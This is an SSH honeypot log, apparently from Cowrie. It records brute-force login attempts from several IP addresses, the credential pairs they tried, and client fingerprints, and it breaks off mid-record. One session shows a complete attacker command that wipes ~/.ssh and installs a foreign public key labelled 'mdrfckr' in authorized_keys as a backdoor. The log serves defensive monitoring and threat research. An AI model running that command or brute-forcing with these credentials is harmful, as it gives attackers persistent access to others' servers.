{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:10.923151Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":24907,"dst_ip":"1.2.3.4","dst_port":22,"session":"25b4114ba4cd","protocol":"ssh","message":"New connection: 49.247.35.31:24907 (1.2.3.4:22) [session: 25b4114ba4cd]","sensor":"my-vps","timestamp":"2025-09-08T13:53:11.214596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:53:11.234148Z","src_ip":"49.247.35.31","session":"25b4114ba4cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:53:11.517191Z","src_ip":"49.247.35.31","session":"25b4114ba4cd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:53:12.682488Z","src_ip":"49.247.35.31","session":"25b4114ba4cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47992,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a2ee9d91737","protocol":"ssh","message":"New connection: 212.227.235.229:47992 (1.2.3.4:22) [session: 4a2ee9d91737]","sensor":"my-vps","timestamp":"2025-09-08T13:53:13.975036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:53:13.976964Z","src_ip":"212.227.235.229","session":"4a2ee9d91737"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:13.980073Z","src_ip":"49.247.35.31","session":"25b4114ba4cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:53:14.083510Z","src_ip":"212.227.235.229","session":"4a2ee9d91737"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":26220,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc05fdf8eeeb","protocol":"ssh","message":"New connection: 49.247.35.31:26220 (1.2.3.4:22) [session: cc05fdf8eeeb]","sensor":"my-vps","timestamp":"2025-09-08T13:53:14.254349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:53:14.261921Z","src_ip":"49.247.35.31","session":"cc05fdf8eeeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:53:14.544204Z","src_ip":"49.247.35.31","session":"cc05fdf8eeeb"}
{"eventid":"cowrie.login.failed","username":"pcp","password":"pcp.123","message":"login attempt [pcp/pcp.123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:53:14.554350Z","src_ip":"212.227.235.229","session":"4a2ee9d91737"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:53:15.643177Z","src_ip":"49.247.35.31","session":"cc05fdf8eeeb"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:15.661373Z","src_ip":"212.227.235.229","session":"4a2ee9d91737"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:15.924513Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:15.925689Z","src_ip":"49.247.35.31","session":"cc05fdf8eeeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52790,"dst_ip":"1.2.3.4","dst_port":22,"session":"adcbb8a15d17","protocol":"ssh","message":"New connection: 212.227.235.229:52790 (1.2.3.4:22) [session: adcbb8a15d17]","sensor":"my-vps","timestamp":"2025-09-08T13:53:16.009977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:53:16.014241Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:53:16.237580Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.login.success","username":"root","password":"Asdfghjk","message":"login attempt [root/Asdfghjk] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:53:17.142079Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:53:17.614243Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:53:17.614929Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:53:17.615993Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:17.848812Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:53:18.883280Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:53:18.884003Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:53:19.115690Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:19.116605Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53954,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ee3d6dbdf9b","protocol":"ssh","message":"New connection: 212.227.235.229:53954 (1.2.3.4:22) [session: 7ee3d6dbdf9b]","sensor":"my-vps","timestamp":"2025-09-08T13:53:19.341776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:53:19.343718Z","src_ip":"212.227.235.229","session":"7ee3d6dbdf9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:53:19.574451Z","src_ip":"212.227.235.229","session":"7ee3d6dbdf9b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:53:20.505172Z","src_ip":"212.227.235.229","session":"7ee3d6dbdf9b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:21.740950Z","src_ip":"212.227.235.229","session":"7ee3d6dbdf9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54756,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f50f4291e8e","protocol":"ssh","message":"New connection: 212.227.235.229:54756 (1.2.3.4:22) [session: 6f50f4291e8e]","sensor":"my-vps","timestamp":"2025-09-08T13:53:21.964093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:53:21.970436Z","src_ip":"212.227.235.229","session":"6f50f4291e8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:53:22.193902Z","src_ip":"212.227.235.229","session":"6f50f4291e8e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:53:23.735780Z","src_ip":"212.227.235.229","session":"6f50f4291e8e"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:23.967388Z","src_ip":"212.227.235.229","session":"adcbb8a15d17"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:23.968427Z","src_ip":"212.227.235.229","session":"6f50f4291e8e"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":40542,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e0b4bd0d69a","protocol":"ssh","message":"New connection: 134.199.174.250:40542 (1.2.3.4:22) [session: 4e0b4bd0d69a]","sensor":"my-vps","timestamp":"2025-09-08T13:53:28.305371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:53:28.306364Z","src_ip":"134.199.174.250","session":"4e0b4bd0d69a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:53:28.642873Z","src_ip":"134.199.174.250","session":"4e0b4bd0d69a"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"1234567890","message":"login attempt [webmaster/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:53:29.778476Z","src_ip":"134.199.174.250","session":"4e0b4bd0d69a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:31.115600Z","src_ip":"134.199.174.250","session":"4e0b4bd0d69a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37182,"dst_ip":"1.2.3.4","dst_port":22,"session":"6988c0334302","protocol":"ssh","message":"New connection: 212.227.235.229:37182 (1.2.3.4:22) [session: 6988c0334302]","sensor":"my-vps","timestamp":"2025-09-08T13:53:35.000385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:53:35.001145Z","src_ip":"212.227.235.229","session":"6988c0334302"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:53:35.129879Z","src_ip":"212.227.235.229","session":"6988c0334302"}
{"eventid":"cowrie.login.failed","username":"nikhil","password":"nikhil","message":"login attempt [nikhil/nikhil] failed","sensor":"my-vps","timestamp":"2025-09-08T13:53:35.685691Z","src_ip":"212.227.235.229","session":"6988c0334302"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:36.816556Z","src_ip":"212.227.235.229","session":"6988c0334302"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":42086,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf436d8d0357","protocol":"ssh","message":"New connection: 134.199.174.250:42086 (1.2.3.4:22) [session: cf436d8d0357]","sensor":"my-vps","timestamp":"2025-09-08T13:53:58.618883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:53:58.619925Z","src_ip":"134.199.174.250","session":"cf436d8d0357"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-